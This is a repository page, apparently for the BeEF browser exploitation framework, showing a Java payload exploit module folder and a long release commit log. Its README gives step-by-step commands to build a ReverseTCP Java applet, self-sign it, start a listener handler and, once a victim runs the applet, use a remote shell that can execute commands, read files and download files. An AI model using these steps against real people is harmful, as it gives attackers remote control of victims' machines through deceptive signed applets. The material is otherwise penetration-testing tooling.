Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
b6425e4a908e5ce8a2eb042f59856010e725ee87
beef/modules/exploits/local_host/java_payload
History
wheatley b6425e4a90 Release 0.5.2.0 (#2166) 
* fixed offline zombie not deleting

* Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161)

Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1.
- [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases)
- [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1)

---
updated-dependencies:
- dependency-name: jsdoc-to-markdown
  dependency-type: direct:development
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Bug: Core - 1785 Fixed public hook url configuration settings (#2163)

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* created command spec file

* add before statement to load all enabled modules to test command class

* add spec to check if configuration instance exists by setting and accessing a config variable

* updated http proto for beef host

* reverting changes on this file, dev values set

* removed some unessessary checks

* fixed grammar test now we're only testing one configuration attribute

* added hook url for contextual usage

* refactoring admin_ui with new code usage

* fixed issue with the location of the beef.http.https.public_enabled

* refactored powershell module and extension

* adding the new config setting for public https beign enabled

* refactor qrcode extension

* replace video fake plugin refactor

* social engineering refactoring

* phonegap module refactoring

* exploit refactoing

* network module refactoing

* ipec module refactoring

* host module refactoring

* debug refactoring

* browser refactoring

* social engineering extension refactoring

* core main server refactoring

* core main console banner refactoring

* removing dev test

* fixed area with location of http.https.enabled

* changed the hook url definition to return the hook file path

* updated banners to use new configuration getters

* updated extensions and modules with the hook url change

* added new public.host configuration settings and validations for depicated usage of public

* updated to use public.port configuration

* added validation for old configuration public_port

* updated to use public https configuration setting

* updated config with new settings format

* fixed get to point to new locations

* fixed pointer to hook_file_path

* Update extensions/social_engineering/web_cloner/web_cloner.rb

Co-authored-by: bcoles <bcoles@gmail.com>

* updated enabled to enable

* making sure default configuration file does not have preset values

Co-authored-by: bcoles <bcoles@gmail.com>

* bumped versions to 0.5.2.0

* Usability: #2145. Added user input request for beef update within 'beef' install script (#2162)

* added user input request for beef update

* swaped git pull from system to backticks

* flags added for auto update and timout to input

* updated install.txt to reference the update-beef script (#2160)

Co-authored-by: Andrew Wheatley <a@andrews-mini.home>
Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: bcoles <bcoles@gmail.com>
2021-09-12 21:33:02 +10:00
..
Applet_ReverseTCP.jar
Added a README file for the JavaPaylod signed applet exploit.
2013-04-06 12:29:05 +01:00
command.js
updated all of the copyright information
2021-01-11 04:48:56 +10:00
config.yaml
updated all of the copyright information
2021-01-11 04:48:56 +10:00
module.rb
Release 0.5.2.0 (#2166)
2021-09-12 21:33:02 +10:00
README.txt
Added a README file for the JavaPaylod signed applet exploit.
2013-04-06 12:29:05 +01:00

README.txt 

--- How to use this module ---
The following is how you compile the JavaPayload handlers :

$git clone https://github.com/schierlm/JavaPayload/tree/master/JavaPayload javapayload-git
$cd javapayload-git/JavaPayload/lib && wget http://download.forge.objectweb.org/asm/asm-3.2.jar
$cd .. && ant compile && ant jar
$cd build/bin
$java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.builder.AppletJarBuilder ReverseTCP

At this point you have the applet ready to go, with a reverseTCP handler:
Applet_ReverseTCP.jar
Note that the applet in this module is already compiled (with Java 7, you might want to recompile it
with Java 6 to run it on those versions too - SUGGESTED :-).

At this stage you need to sign the applet.
The following is to create a self-signed certificate and then sign it.
Obviously if you have a valid code signing certificate, even better ;)

keytool -keystore tmp -genkey
jarsigner -keystore tmp Applet_ReverseTCP.jar mykey

Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.

You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh

Now launch the BeEF module.
If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
! help
help: show information about commands.
  Usage: help [command]

Supported commands:
    help   - show this help
    info   - list system properties
    pwd    - show current directory
    cd     - change directory
    ls     - list directory
    exec   - execute native command
    cat    - show text file
    wget   - download file
    telnet - create TCP connection
    paste  - create text file
    jobs   - list or continue jobs
    exit   - Exit JSh

When inside an interactive command, enter ~. on a new
line to exit from that command. Enter ~& to background the command.
Enter ~~ to start a line with a ~ character
Reference in New Issue View Git Blame Copy Permalink